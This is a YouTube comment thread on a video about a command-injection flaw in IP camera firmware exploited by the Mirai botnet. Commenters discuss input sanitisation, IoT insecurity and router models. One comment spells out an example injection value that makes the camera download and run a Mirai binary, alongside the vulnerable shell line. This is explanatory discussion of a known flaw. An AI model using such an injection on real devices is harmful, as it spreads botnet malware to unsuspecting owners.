Need student discount too costly for Indian students from middle class family
@Mohojo2 ай бұрын
Hey Ed, Why not create a course for reverse engineering?
@PremiereStoss-qm9un2 ай бұрын
Hey Ed, are your courses beginner friendly? I have been learning C and still very much a newbie. I am interested in your courses, mainly C and Assembly. However, you are so advanced in your knowledge that I am nervous about joining to find out that it is way over my skill level, etc. I really am looking for an assembly that is ZERO to Hero type of course....
@sprinteroz22392 ай бұрын
is there a firmware that works on most cameras that is safe to use ?
@davidcraig81062 ай бұрын
you should bring up this vid to Wendell at Level 1 Techs EDIT: he said years ago there's no standards. he even was working on setting up a DMZ type thing that looked at every single packet that went in and out of the IoT devices he used. without standards and open source, IoT is a risk to int'l security. maybe not the gov't, but int'l meaning the internet as we know it.
@martinzihlmann8222 ай бұрын
the S in IoT stands for Security
@yomajo2 ай бұрын
@@martinzihlmann822 original
@davidyoder58902 ай бұрын
This is perfect. Well done sir.
@GREG_WHEREISTHEMAYO2 ай бұрын
But there’s no s
@flippy15892 ай бұрын
@@GREG_WHEREISTHEMAYO that's the joke
@TheSkypeConverser2 ай бұрын
Love this
@josephlabs2 ай бұрын
0 sanitization on inputs that has a connection to system calls is insane.
@pfqniet2 ай бұрын
What's crazy is that there *is* sanitisation. Just above the offending line there is a line that removes character 0x22 from the input. That is the double-quote character, which would indeed be a way to attack the injection vulnerability. So somebody thought to defend against a possible injection, and still botched it. In this case, I would presume the LED value should be a number so just... Use %d instead of %s???
@InventiveDingo2 ай бұрын
@@pfqnietThere's technically at least one extra step required (strtol() or similar to parse the string to a number), but yes, not hard. Maybe some quick range checks for good measure. When validating input, always validate maximally. Of course, running shell commands is the wrong way to do this anyway. I would reject this code review and have a friendly chat with the author.
@bothieGMX2 ай бұрын
Always whitelist valid input and reject everything else. However you do it, doesn't matter.
@ChasOwens2 ай бұрын
@@pfqniet You can’t just change the %s to a %d; pcVar2 is a string (which is insane because they already are parsing it into an int). A better thing would be to use the iVar4 variable instead and then use %d. But even that is wrong. Look at what the commandline code is doing: writing a value to a file. This is pure laziness. The programmer should have just opened the /proc/driver/pwm file and written iVar4 to it. That would have removed even the possibility of a commandline injection since no shell would be launched. It even would be more efficient.
@ohokcool2 ай бұрын
Reminds me of when I accidentally put a backslash at the end of a password (because it’s right next to the enter key) and due to lack of sanitization it crashed the whole system that it was running on. 😂 I’m not going to say which company but it was a massive one that put the services in the hands of 2 people who didn’t think to sanitize password fields
@coreymartin96302 ай бұрын
This 100% counts as gross negligence, if my crappy online Python course can do user input validation, a _security_ company should be able to
@CrimeyCenter2 ай бұрын
Not when they hire the lowest common denominator coders and don't do your own penetration testing and code reviews with security experts.
@JJFX-2 ай бұрын
Hell, I've made batch files that do a better job at input validation than this.
@kentacy692 ай бұрын
@@CrimeyCenter that sounds... Grossly negligent
@edwardallenthree2 ай бұрын
Exactly! This is a classic injection vulnerability. It might as well serve as an example of what not to do, and reminds me of several examples of what not to do when I learned how to do CGI programming in Perl in the 1990s. Why are they using the shell to do this? Why are they that lazy?
@jino1392 ай бұрын
There's no good pay for embedded systems cybersec positions.
@xXYourShadowDaniXx2 ай бұрын
And THIS is why you run your Smarthome devices in their own VLAN with NO access to your other VLANs
@nicholasj32132 ай бұрын
Basically impossible for regular people.
@andreffrosa2 ай бұрын
Regular "routers" don't allow you to even do that even if people knew how
@monkemode81282 ай бұрын
@@nicholasj3213Yeah and for many it would require new devices. Unless you made your purchasing decisions with that in mind, but the average person doesn't.
@scheimong2 ай бұрын
This. I had all my IP cameras placed into a VLAN that can only talk to one specific local IP which hosts my NVR software (Frigate), which runs in a non-privileged container (podman is great), on an SELinux-enabled RockyLinux 9 box. If an attacker can break in and out of this onion they can have all my data 😁
@RiversJ2 ай бұрын
@andreffrosa That sadly is just a case of you get what you pay for, going with the ISPs wormbox or getting the cheapest option despite most people knowing someone atleast slightly technical person to ask for recommendations.
@henrijohansson24822 ай бұрын
0:36 missed opportunity to say "Another day and another Zero-Day"
@MessyMasyn2 ай бұрын
sounds like the opening to a song
@subtlewolf28 күн бұрын
day %= 2
@ExEBoss26 күн бұрын
@@subtlewolf Actually, it’d be `day %= 1`
@ExEBoss26 күн бұрын
@@subtlewolf Actually, it’d be day modulo 1
@ExEBoss26 күн бұрын
*@subtlewolf* Actually, it would be day modulo 1 *(KZbin* bots keep eating my comments)
@paulramasco67692 ай бұрын
I didn't realize Mirai was still going on. For my cybersecurity class a few years ago I did a report on zombie botnets and this was a major thing. Its crazy that camera vendors (who Mirai was targeting before) didn't shore up that hole.
@V3racious32 ай бұрын
It isn't a specific hole. That''s what she said.
@asteriks_hardcore2 ай бұрын
Mirai, qbot and other families never stopped being active, due to there being hundreds of variants
@ZippyZen-pw5uq2 ай бұрын
camera vendors: meh (continues spinning in chair)
@davidcraig81062 ай бұрын
They care about profits and not security. Like seriously. Camera software isn't open source. There's no standards. How in the hell is the average consumer supposed to know. We need standards yesterday and a campaign to say just what is and what isn't acceptable.
@gamersunite90262 ай бұрын
mirai is MOST DEFINITELY still going on. bunch of servers still getting requests from the botnet to try and backdoor through /cgi-bin/
@PeterZaitcev2 ай бұрын
Wait a second, why is it unpatchable if it allows executing external code? You could install the update _fixing_ that vulnerability _using_ that vulnerability!
@zombieregime2 ай бұрын
Yes. And there have been computer viruses that fixed vulnerabilities the vendors refused to address. There was at least one that I know of regarding an ISP router.
@ujiltromm7358Ай бұрын
There are also viruses that fix the vulnerabilities they use to penetrate the victim system, so other bad actors can't enter through the same door. It do be a competitive environment.
@BomkzАй бұрын
@@ujiltromm7358 there's also that story of a business opting not to remove a cryptomining malware because the ones who made it kept their systems updated and patched out any other people trying to hack it just to keep it to themselves.
@Ilix422 ай бұрын
Man, "spray and pray" is never how you want a successful security breach to be described.
@Car0linaPh03nix2 ай бұрын
I disagree about vendors not making firmware available. Is FOSS also insecure because the source is available? Or is it MORE secure, because it can be audited by anyone? The issue is vendors writing shitty code and, more importantly, either not patching it when vulns are found, or, often, not even having the capability to patch it.
@TrippSC22 ай бұрын
I think the worst of all possibilities is to have unencrypted firmware available without source. If the source was available, you at least increase the likelihood that security researchers may at least have a chance to catch bugs and propose fixes.
@Adesterr2 ай бұрын
The golden rule in IT security is "obscurity is not security". This doesn't mean that keys should be published like microsoft likes do to "accidentally", but that the algorithm to protect something shouldn't rely on not being published. In the end it comes down to just desoldering the ROM with the firmware and reading its content. So, yes, every professional IT security expert will tell you that the Firmware should not rely on being a secret.
@TrippSC22 ай бұрын
@@Adesterr If your point is that obscurity shouldn't be the entirety of your security strategy, we're in total agreement. My point is that, from a practical standpoint if making source available is off the table, obscuring the firmware provides some level of deterrence from the exploit being exposed. This along with diligent internal testing and code quality standards is a more reasonable security strategy than not obscuring the firmware.
@nomore61672 ай бұрын
"Is FOSS also insecure because the source is available? Or is it MORE secure, because it can be audited by anyone?" - It is not more secure. More accurately, the question of whether open source software is more or less secure than closed software is unknowable because we don't know how secure either category really is. I would, however, point to Ed's 21 April 2024 video, "this is a warning to anyone using php", which highlighted a 24-year-old buffer overflow vulnerability in glibc. If "it can be audited by anyone" really meant superior security, then that vulnerability would not have persisted for 24 years. I do agree with your original point, however -- the firmware should be available, and security through obscurity is no security at all.
@ErazerPT2 ай бұрын
It's neither. If the code is secure, both people checking it for "secure" or "vulnerable" will find nothing. Now if it's NOT secure, and let's assume 100% competency, IF you have someone checking it for security they will spot it. IF. And IF it's any software with any decent amount of users, someone WILL be looking for vulns and spot it. The "many eyes" thing only works IF there's actually many (competent) eyes looking out for things...
@luxploit2 ай бұрын
I think Ed's old Router is a Netgear Nighthawk, probably an R7000. I recognise the hideous casing and 3 way antenna setup. I flashed mine with FreshTomato, way better then NG's stock fw
@chinesepopsongs002 ай бұрын
My Guess was the R6400 because the PCB layout is different. Unless there is a revision of the R7000 that looks like the R6400 which i have never seen then i think it must be a R6400.
@VladSuperKat2 ай бұрын
Or Tp-Link those were forever vulnerable routers :D
@reaperinsaltbrine52112 ай бұрын
@@VladSuperKat Yupp...but you can change the firmware on them. The worst was the blunder when they changed the chipset from Marwell to some Broadcom crap: oh boy, are those vulnerable at the hardware level :D
@kirglow46392 ай бұрын
Was about to guess Netgear. Welp
@jongeduard2 ай бұрын
At least with a google search I could find photographs and articles about it, the shape of these Netgear routers is pretty recognizable. And I new about the trademark that it's known for the problems.
@Jirodyne2 ай бұрын
Companies, I would argue ARE 100% Liable, under Express Warranty. If you buy a product, they are expressing a warranty that there is nothing critically wrong or harmful with that item. A massive issue like this? I would 100% argue that breaks warranty and they are 100% Liable for any damage caused by the virus that was installed on your device because of their negligence of securing the device. But then again, I'm not a lawyer, and the courts don't care about consumers would side with the company who is paying them behind the scenes.
@JJFX-2 ай бұрын
If they made no significant attempts at resolving the issue you probably could but the courts are notoriously behind the times on these issues. The other problem is how many of these products flooding Amazon are just overseas companies.
@jbird44782 ай бұрын
Software companies are notoriously exempt from liability. Almost every software product has a user agreement that basically tells you they are not responsible even if the software is entirely unfit for its purpose and accidentally blows up your house instead. The degree to which such user agreements can be uphold in the court of law varies, but in general it does. Judges know nothing about software so they rely on industry experts, who basically explain them it's some sort of extremely complex magic that cannot possibly come with any sort of guarantees.
@sasjadevries2 ай бұрын
@@jbird4478 Except that's for the software itself, not for the physical hardware product that just happened to contain that software. It's the responsibility of the manufacturer of the IoT device to figure this out. Either they develop their own stuff, or they can test open software, or they can hire a software company that's certified and has liability written in the contract. If an IoT device burns your house down, then it doesn't matter if it's a hardware problem or a software bug.
@forlexer2 ай бұрын
Go sue China....oh wait you can't
@LTPottenger2 ай бұрын
Judges decide any case however they want, including jury trials because they control exactly what the jury sees. So in the miu case they did not show the video of the 'children' attacking the old man only selected still photos, for example.
@Trenjeska2 ай бұрын
Full access to firmware is not a bad thing. In fact, it should be a requirement for any device. How else are you going to re-flash the device or maintain it without dependency on the manufacturer that may or may not exist anymore?
@gairisiuil2 ай бұрын
security by obscurity is always safe until isn't, at which point it REALLY isn't
@sasjadevries2 ай бұрын
Why does this security camera have an operating system like linux to begin with? All it needs is 1) a bootloader, 2) minimalist networking software, 3) video encoding stuff, and some encryption algorithm that can be part of the networking binary or the video binary. The whole thing could be a single binary and be fully embedded, or it can be a few binaries running on freeRTOS. Why would a camera need wget? Why would it need bash? What's the upgrade path of "a camera"???
@chocolate_squiggle2 ай бұрын
@@sasjadevries A crappy standalone camera I bought 10 years ago had its own embedded HTTP server, so you could configure all sorts of options. Not all of them connect to a central controller.
@mapu12 ай бұрын
@@sasjadevries lets you do facial recognition and stuff locally, and compress the archives and so on. If you are doing bunch of stuff like that, at a point you are better off just using linux, cause you just let the user put on whatever they want on it instead of writing custom software and drivers. That said just don't connect your stuff directly to the internet. It's gonna get hacked.
@sasjadevries2 ай бұрын
@@mapu1 That is a good point, but with a catch. I would rather do "local" object recognition on a server that multiple cameras connect into. Mix and match any server with any software and any camera, without vendor lock-in. The cameras could be just wired analog ones, or at most something digitally compressed. Doing all the processing on the camera itself would make sense if you install the camera in a way that it can be jammed, because it has to be wireless, because it's on moving subject. Or if you only need one or two cameras for your property, and have no plans for expanding surveillance later.
@makebreakrepeat2 ай бұрын
10:07 Thanks LLL, your the best
@_ilincic2 ай бұрын
@@makebreakrepeat quote
@be1tube2 ай бұрын
Replying. Agreeing. (algo bait)
@1337bitcoin2 ай бұрын
This
@Egryzilon2 ай бұрын
Agreed
@ByronKirby2 ай бұрын
Had to zoom in and it was a bit fuzzy, but certainly legible. Thanks LLL
@Lupinicus16642 ай бұрын
You are providing a great service, both by explaining interesting topical exploits but also by providing real courses to get people better educated. I am now retired after 40+ years in IT, starting with 25 years of assembly programming on realtime kernels in the mainframe world, then transitioning to security. Lack of knowledge about how the machines actually work is very common amongst modern programmers. Improvements in knowledge should lead to more secure architectures and code. Please keep up the good work.
@naimah922 ай бұрын
The attitude of “it’s just software” needs to go away. There needs to be an engineering rigor applied to get correct(ish) and safe software. We don’t allow civil engineers to self certify so why are we doing that with software?
@glynnetolar44232 ай бұрын
This started in the 70s where software was given special consideration. No consumer protections, licensing restrictions, etc. Maybe these things and CrowdStrike may change things.
@rethardotv58742 ай бұрын
@@glynnetolar4423because everybody and their mom can write software and publish it. This is anti elitist, anarchistic and awesome for all of us. Medical device software needs to be certified bc it can kill ppl but nobody got ever killed by a software bug in a surveillance cam.
@andrewpredmore29682 ай бұрын
It's supply and demand. The need for software developers has grown exponentially (even logarithmically) over the last few decades. There are literally tens of millions of developers all over the world, and I would bet 99% of them do not have anything near a masters degree in engineering. Even if all companies required them to get advanced degrees and were willing to pay for that, there just aren't enough schools that could handle the load. And let's face it, most developers just start out working on business logic in spreadsheet macros, or modifying JavaScript. Eventually, they are asked to work on something that is over their head.
@sasjadevries2 ай бұрын
There are quite strict rules for certain categories of software, OD-178, iso26262 and the whole safety-critical branch for medical equipment, aviation, etc. Then the smarter governments usually have certifications for software handling personal data, payments, etc. But this stuff should just be broader, such that you had at least some of this for software in household appliances.
@sasjadevries2 ай бұрын
@@andrewpredmore2968 I would argue, that this demand is unjustified. Firstly, most agile developers are like stacking a framework on top of a framework, for something that could have been vanilla html+css generated from some markdown. Or they are shell scripting and pipelining filtering software A into filtering software B into conversion software, for what could have been a single shader. Secondly, these soydevs mess up, so you need another soy dev fixing (i.e. ducktaping) the other's work, and a scrum master and a selfproclaimed tester. Thirdly, even a small businesses, like a local bakery with 3 locations in your city, feels like it needs it's own app, because a website and PWA is not enough. And why would people make a few good tools, when you could make thousands of mediocre ones? Finally, that spreadsheet script is usually for a job that could have been automated away, and shouldn't have been done in a spreadsheet to begin with. p.s. ducktape is not a typo, "duck" is the canvas that the tape was made out of, before it was used for ducts😆.
@HinaraT2 ай бұрын
The worst part is that the bug would not have occured if they just simply wrote directly to the file as the kernel would have refused it.....
@timoadler63562 ай бұрын
indeed. What's this whole echo and redirection stunt for anyway? Does the shell have higher priv than the cgi Factory binary or what?
@AubreyBarnard2 ай бұрын
@@timoadler6356 I'm guessing that the echo is just a shortcut in the code to writing to the particular file, as @TheRobbix1206 describes. I'm guessing that one can control the brightness by writing certain values into that particular file, just like one can control the swapiness of the Linux kernel by writing into '/proc/something/swapiness'. (I don't remember the specific file, but hopefully you still understand what I'm trying to say.)
@AubreyBarnard2 ай бұрын
@@timoadler6356(I forgot:) That is, I don't think it has anything to do with privilege escalation. (I'd have to go back and watch the video again to make sure, by carefully noting what was executed and with what specific file(s).)
@AubreyBarnard2 ай бұрын
Yeah, it's as I thought. After zooming in (on my hand computer that has radios), the specific shell command is `echo DUTY_RATIO="%s" > /proc/driver/pwm`. So it looks like 'pwm' is a virtual file where one can write certain configuration to control the camera. (The camera reads that file, parses it, and acts accordingly.) So, while the kernel wouldn't prevent access to that file (as OP suggests), presumably the parser for that file would error out upon finding an arbitrary string instead of the expected literal atomic value (float? int? word?), much less executing said arbitrary string, which could be something like `DUTY_RATIO=wget 0.0.0.0 -o /mirai && /mirai`.
@AubreyBarnard2 ай бұрын
@TheRobbix1206 If the binary has permission to execute a shell command that writes to a file, then the binary should have permission to write directly to that file, so the kernel wouldn't deny opening the file (unless the effective user somehow got changed, but I don't see anything in the code that does that).
@DadofScience2 ай бұрын
I've not embraced IoT stuff because I have no faith in businesses to create products that are "safe" if they have no external obligation to do so. For example, pharmaceuticals are heavily regulated for good reason because they have the potential to cause great harm. I don't want stuff like that in my home, thanks. Great work, Ed.
@lorenzopazzification2 ай бұрын
It's funny that the vulnerability is in the line with the "safe_printf"
@thecakeredux2 ай бұрын
Literally in my very first lesson on C way back when, I learned what input sanitization is.
@madson-web2 ай бұрын
"the internet of things sucks" YES
@Kane01232 ай бұрын
Buying smart devices is ironically a dumb thing to do.
@benarcher3722 ай бұрын
Why is anyone surprised that bugs like this exist? The number of connected devices out there is enormous. The companies developing these are probably more interested in launching the product than spending yet another dollar on testing or implementing a safer language. I have no idea how to fight this. Regulation? Informed users? Videos like this :-) -> definitely! Thanks for a good walk-through.
@LUEcifer2 ай бұрын
Router looks like a Netgear Nighthawk R7000.
@YaySyu2 ай бұрын
Nighthawk lineup are insecure.
@OVERKILL_PINBALL2 ай бұрын
@@YaySyu What about when you run DD-WRT or OPEN-WRT latest kernels?
@MelroyvandenBerg2 ай бұрын
R6700
@MelroyvandenBerg2 ай бұрын
Why not just install OpenWRT?
@YaySyu2 ай бұрын
@@MelroyvandenBerg You cant do it on most of them without flashing the board. I had to open mine up to flash it.
@CoreDump4512 ай бұрын
I actually made a presentation about Mirai back in 2018 for my security class. Man it feels like yesterday
@IanBPPK2 ай бұрын
I had a legal and ethics in computing course during the semester that the October 2016 Dyn ttack occurred. My group's assigned topic had to do with IoT devices. We had half of our project handed to us on a silver platter with that attack.
@MSThalamus-gj9oi2 ай бұрын
When people first started talking about networking elements and appliances in the home, I thought it was a pretty neat idea. When that became a reality and all those devices were connected to the Internet, I thought people were absolutely *insane* for using any of them. The closest thing to an IoT device I use is a Roku, and i'm happy to keep it that way. I even disable networking on my retro gaming PCs.
@nomore61672 ай бұрын
But how will I cook my food if my microwave can't connect to the Internet? How will I heat my home if my thermostat can't connect to the Internet? How will I know when my laundry is done if my washer and dryer can't connect to the Internet?
@MSThalamus-gj9oi2 ай бұрын
@@nomore6167 I mean, I get that you're joking, but it'll get to that point! It's already true that, where I live, I need to have a cell phone with its own separate data plan in order to activate a new modem for my cable broadband service. It's just ludicrous, but it's true....
@nomore61672 ай бұрын
@@MSThalamus-gj9oi Sadly, I believe you're right that it'll eventually get to that point. Either probably be a combination of people's laziness/"convenience" (wanting to be able to access everything from their phone), company greed (data collection / analytics for everything), company control, and planned obsolescence. Personally, I think it's bad enough right now when we need to go to a company's website to download the user manual for pretty much everything.
@nomore61672 ай бұрын
@@MSThalamus-gj9oi With regard to needing a cell phone to activate a new modem for your cable broadband service, what's the reason for that (if you don't mind me asking)? If it's because it requires an app, then it's even worse than simply requiring a cell phone; it'll probably require a relatively new cell phone because most companies will support only the latest device OS and maybe the one before that. I'm at that point right now with Capital One, my credit card provider. I have an iPhone 6s. Sure, it's 8 years old, but it does everything I need it to do. Except Apple doesn't allow this phone to upgrade to iOS 16.0 or above, and the Capital One app now requires iOS 16.0 or above. More accurately, the app says it supports my phone, and it will install on my phone, but when you open it, it says you need to upgrade to the latest iOS. So I lost the ability to get realtime notifications (about new charges, payment confirmation, fraud alerts, etc) and control my credit card from my phone simply because I refuse to buy a new phone.
@woosix77352 ай бұрын
If its not already regulated, this kind of software absolutly should be. And not just slaping the copany on the wrist when it gets found out, but something to prevent this from happening in the first place.
@slugfiller2 ай бұрын
The bigger question is: Why `echo` into a file instead of, I dunno... just `fopen`ing the file and writing into it. It's not like `echo` is some sort of black magic, nor is the bash file pipe operation. I can't imagine that a program that can execute bash doesn't have access to `fopen`.
@c128stuff2 ай бұрын
Lol, that flaw is so obvious, seeing the reverse-engineered code just hurts my eyes.
@jay33682 ай бұрын
I am new to all of this and watch because its an interest. I had to go look up what input sanitation was and why you do it in code. After doing that, I watched the part where you explain the vulnerability and it made so much sense
@von...2 ай бұрын
"thanks Triple L, you're the best! I am a ***generic mobile user agent*** and I am very ***positive adjective*** that you were thinking of us!" ***actually viewing on a 1000:45 mega ultrawide with 10k smell-o-vision*** "...pft they dont even know im only pretending to be a mobile user"
@neniugrava2 ай бұрын
I'm a mobile user agent, and I approve this message
@dragnl0rd2 ай бұрын
0:42 Took me a minute to nail it down, but that specific router is the Netgear AC1900 wifi router (r7000). I can tell it's that rather than the AC1750 because yours has the usb port next to the wan port.
@GetFitEatRight2 ай бұрын
FreshTomato FW all I'm going to say.
@ProfRoxas2 ай бұрын
right when the exploit was shown, i failed to understand how someone could even do this, like, i fail to process how someone could do this and be like "what could go wrong" feels like programming became too accessible and we get vulnerabilities that could be prevented by thinking
@DarkSwordsman2 ай бұрын
I don't see you in my recommended often, but I am glad I clicked on this. I didn't realize you actually went through the binary and what not. It's really cool to see you do a technical dive in a layman-way, rather than just say "there is a vulnerability! ahh!"
@capability-snob2 ай бұрын
The punch line is that they call atoi(), but don't use that value in the substitution!
@BillLambert2 ай бұрын
Came down here for exactly this. They were so close, just use %d and that int var instead of the string... definitely a copy-paste-compile "hey it works" SHIP IT!
@D4MNF0xy2 ай бұрын
I'm always baffled by how those companies apparently never use code scans. I've actually made a similar mistake, that got flagged by a code scan before any deployment. I forgot to check one input which resulted in a potential full read access for the server directory. Joke is: I've could have sworn, that I did the check in the other module.
@ewhac2 ай бұрын
...I _cannot_ believe that code passed any kind of review. "Y'know, I could write three lines of code that fopen()s a file and fprintf()s to it, but that's for suckers. I think I will _LAUNCH A SHELL TO RUN AN ECHO COMMAND!"_ Anyone in the chain who let those lines of code pass by them (in that screenshot there's at least two other examples of completely unnecessary shell commands) -- from the original coder to the reviewers to the release engineers to the managers of same -- should find themselves in front of HR arguing why they should continue to work for the company.
@sirgouki62072 ай бұрын
A shell that no one would normally see no less. I worked security at a company I'm not going to name for a specific reason: guess what cameras and software they used? To get access to that print out, you gotta jump through some menus and you lose screen real estate, which is something you don't want when you're watching cameras for thieves and accidents. However, we had 3 monitors, so I'd have the camera's on 2 of them as I could fit just about every single camera in the whole warehouse that way, and still see what was happening, and on my left most monitor I had the thing that was displaying these messages and a notepad open. I'm also thankful that they had it set up in a way that my layout was tied to my account on their network, so when I logged into the computer and ran the software everything was already the way I had it, and I didn't have to worry about other guards messing with my shit. I actually was able to notify the people in charge of security multiple times that cameras were malfunctioning before it showed in the software by having that thing up, but the average user would have no idea it was there (I even had to teach the head of security how I did it, because she had no idea it was a thing).
@anthonywalker62682 ай бұрын
It's actually better that they do post it, because it has to be fixed on sight.
@bits360wastaken2 ай бұрын
What part of "unpatchable" do you not understand?
@anthonywalker62682 ай бұрын
@@bits360wastaken what part of people don't have the power of prophecy do you not understand.
@GameDevMadeEasy2 ай бұрын
@@bits360wastaken But... It is fixable with a new firmware version release. As long as users install the new firmware version, the issue is patched. Yes, it technically is unpatchable because they can't just send the update to the user's device to auto install it, but the post calling it unpatchable is a red herring to begin with as it makes people assume that the issue can't be fixed at all, which is not the case.
@EricDMMiller2 ай бұрын
@@GameDevMadeEasy they could abuse the bug to force the system to download and install a firmware upgrade.
@GameDevMadeEasy2 ай бұрын
@@EricDMMiller Companies can't do something like that as it is unethical and could lead them into legal hot water.
@rumplstiltztinkerstein2 ай бұрын
There are very creepy people out there that get enjoyment from hacking cameras and recording them live on the dark web. Be very careful with cameras. Even your webcam.
@RubyCascade2 ай бұрын
_Especially,_ with your webcam. I have a piece of blue tape over my MacBook’s camera, yes.
@rumplstiltztinkerstein2 ай бұрын
@@RubyCascade Here is some info that I wish I didn't know about: Search for the tag "hacked camera" in adult sites. That raises our paranoia to levels high enough that we want to warn all of our friends about keeping cameras on.
@DavidTriphon2 ай бұрын
@@RubyCascade Once upon a time (10+ years ago) I was told that macbook cameras couldn't be powered without the green light turning on so that you knew it was being used. Later on I was told that it had been true but was no longer true, and could potentially be hacked at a firmware level. I have no idea of the validity of either of those claims.
@reaperinsaltbrine52112 ай бұрын
@@DavidTriphon If you don't have a switch that physically cuts power to it, then it can totally be controlled by software :/ You can actually buy smartphones whithout camera and even microphone (so you need a headset to even use it as a phone). You can even order them to be shipped in tamper-evident packaging :)
@Bramble203222 ай бұрын
@@reaperinsaltbrine5211 Those are prime targets for supply chain attacks, and factories that make consumer stuff arent profiling and hand picking people to assemble shit. I'd actually avoid that stuff like the plague if i was you. Tamper-evident packaging is just straight up marketing, its an illusion.
@ronny3322 ай бұрын
Nothing really changed in the last 20 years. The people/companies still don't care about simple variable cleaning. Thanks for sharing 🙂
@tekneinINC2 ай бұрын
4:36 : I’m gonna say that’s a Netgear Nighthawk?
@krisbruenn1082Ай бұрын
I can see the code when I run the video in landscape mode on my phone. You are the greatest, and this video is a keeper.
@Fs3i2 ай бұрын
11:42 lmao, the noise of someone who is in despair
@catdisc53042 ай бұрын
Thanks triple L, you're the best!
@WaterGame77772 ай бұрын
The realization of just "oh.... ohhhhh..... they're really doing " always gets me
@Karn00102 ай бұрын
Not much of a programmer myself, but you break these things down so well that I get a basic understanding of why things like this are bad.
@hairetsu2 ай бұрын
this is so common, raw dogging http requests is the bread and butter of the tech industry, what validation? what sanitizing? who needs that!
@sprytnychomik2 ай бұрын
9:06 pro tip: try using fzf - a command-line fuzzy finder, for finding files and/or input lines. Works like a charm in CLI workflow.
@marklonergan38982 ай бұрын
They did sanitize the input. They used a function with the word "safe" in its name before the system call, so they have met or exceeded the standard of IoT security.
@Rudxain2 ай бұрын
I hope this is sarcasm
@marklonergan38982 ай бұрын
@@Rudxain yes and no. Saying they did sanitize was sarcasm. The jab at the lack of security in IoT wasn't - there is a horrible lack of security across the board
@Rudxain2 ай бұрын
@@marklonergan3898 LMAO
@Arina-hs4hi2 ай бұрын
I have zero clue what you are talking about 90% of the time but as a 2nd semester comp sci student, I love the structure of these videos! It’s fairly easy to follow along and it motivates me to learn more about cybersecurity:)
@Oler-yx7xj2 ай бұрын
I love how even for NSA, translating a word into Russian makes it sound hackerish
@AnotherFreakingDude2 ай бұрын
11:42 When he _OOFd_ , I really felt that
@AndreSomers2 ай бұрын
So, why is it claimed to be “unpatchable”, as this seems like quite a simple thing to fix.
@MorbidEel2 ай бұрын
I think it is unpatchable in the sense that there won't be a patch available because it is a discontinued product
@TheDudeAbidesYo27 күн бұрын
It's always a treat watching your show. I always learn something new.
@arcticzomb2 ай бұрын
Well, that’s why I keep my security cameras on their own local network :)
@RabbitWatchShop2 ай бұрын
Your cameras aren’t safe, either, Mr. 2000s era pre-emoji smiley face
@rmp5s2 ай бұрын
Werd. Mine are completely segregated...have their own router and everything.
@EximiusDux2 ай бұрын
@@RabbitWatchShop wait until you hear about MSN Messenger and how emojis already existed back then during the early 00s. Some people don't like to use image based smileys / emoji.
@methamphetaminer2 ай бұрын
@@RabbitWatchShop ok mossad
@bjorntorlarsson2 ай бұрын
That's why I don't use cameras. Actually, the real reason is that I don't find myself all that photognic anyway.
@chocolate_squiggle2 ай бұрын
Ugh, I'm not a programmer, just been around IT long enough to be familiar with some concepts. Over the years I've written myself stupid heinous shell scripts thousands of lines long, which I know competent programmers would cringe at. But as amateurish as my scripting is, I always deliberately included lots of sanity checks for any arguments / input. And for other actions. Yes because I don't want my script deleting a wrong file but even where that's not a possibility, I did it simply for the practice & the habit because I know that is a CORE COMPETENCY of programming which I may want to explore one day. This sort of shit is frustrating even for us who aren't programmers. Thanks for the explanation of it.
@rtothec12342 ай бұрын
If you have built in cameras on your laptop do yourself a favor and buy yourself a six pack of webcam slide covers. $5 solution for a major problem. You just glue them to your screen or notch and can block your cam for the 99% of the time you are not using it.
@AlecMaly2 ай бұрын
Thanks for showing the vulnerable code, need more of this type of content.
@JarheadCrayonEater2 ай бұрын
The lack of security in IoT and "home automation" is a carryover from SCADA. That world has been focused on getting things working so much that they seemed to forget the vulnerabilities. I used constantly shake my head at the lack of security in PLC's, and other equipment, used in critical infrastructure and various other kinds of industrial automation. It's a mess, or at least used to be serval years ago.
@reaperinsaltbrine52112 ай бұрын
To be fair: the SCADA world started way before globally connected networks were a reality and the sunk cost of all those systems make upgrading very costly. Also there are issues with QA and legal certfifications and the like.. Also: industrial control systems should be separated (if only for safety reasons) from other networks, with very narrow and well defined doors to the outside world. And frankly if operational safety and data/communications security are in conflict, I usually would pick safety.
@JarheadCrayonEater2 ай бұрын
@@reaperinsaltbrine5211, even with the separation, security was kicked down the timeline in the devices and PLC's. Until Stuxnet, there wasn't as big of a push for security, especially on the implementation side. At that time, manufacturers had considered and adopted it, but it wasn't used as it should have been. My comment was to focus on the implementation side, mostly, since that's what was carried over into home automation and IoT. Complacency in those industries was not a good example, yet was followed in the big IoT movement when it reached the market.
@reaperinsaltbrine52112 ай бұрын
@@JarheadCrayonEater You have valid points. Although I think the "IoT" crappiness is more the result of extremeely low profit margins than anything else. Also people's preferring convenience over anything else. About complacency: may have a role in it in many places. The devices presented in the video are products of the typical Valley rent-seeking startup mentality. What frightens the crap out of me that this thinking is no creeping into medical devices, too, see NeuraLink: I don't want to have to do anything with those. Btw I do NOT have cameras, lights, fridge, anything that is allowed to communicate outside my network without expilcit permission. Hell, I deliberately stuck with good old mechanical lightswitches and a dumb fridge :D These things will fade out like any other fad, the question is after how many damage?
@JarheadCrayonEater2 ай бұрын
@@reaperinsaltbrine5211 , you have great points as well. It's not just one thing, as is usually the case. I'll just never forget when I started hearing the term "home automation" being used daily. I was a control system engineer on the pump stations in NOLA, among other industries, and just had to laugh at some of my stuff I saw coming out. Thinking "oh, boy, a lot of people are going to get rich, and a lot of others are about to find out the risks".
@reaperinsaltbrine52112 ай бұрын
@@JarheadCrayonEater oh, boy, a lot of people are going to get rich, and a lot of others are about to find out the risks". Yeah...seems it is not only my experience. I sometimes surprised the whole thing didn't collapse on us yet :o) In the last ~20 years I mostly do infrastucture ops and the kludge-on-kludge patchwork I work with everyday LOL. Not to mention the kludges I put in there just to keep it rolling :/ New shiny things always get money....maintaining the guts of the system is an uphill battle :)
@palme74142 ай бұрын
single handedly explained whole route people teach themself over decades, good job. btw why didn't you talk about the "unpatchable" nonsense in article title ?
@Vixikats2 ай бұрын
*Shows Router guts* "Every router in this family was vulnerable to a zero-day-" Me, looking 3 feet to my right seeing the exact router he just held up... Hmm.
@GetFitEatRight2 ай бұрын
Install Fresh Tomato and move on with your life.
@BrokenSoul79x20 күн бұрын
Good way of "spreading awareness" and making sure _everybody_ know what to exploit and where... I'm _sure_ that does SO much good. 😑
@LiveseyMD2 ай бұрын
The worst thing is that this has already happened in the past. Humans never learn...
@natescode2 ай бұрын
Yup. Ever 5 years or so some company leaves passwords in plain text or allows SQL injection
@RealILOVEPIE2 ай бұрын
Netgear Nighthawk R7000v1 would be my guess for the router. Good thing I replaced the firmware on mine on day 1 with an alternative.
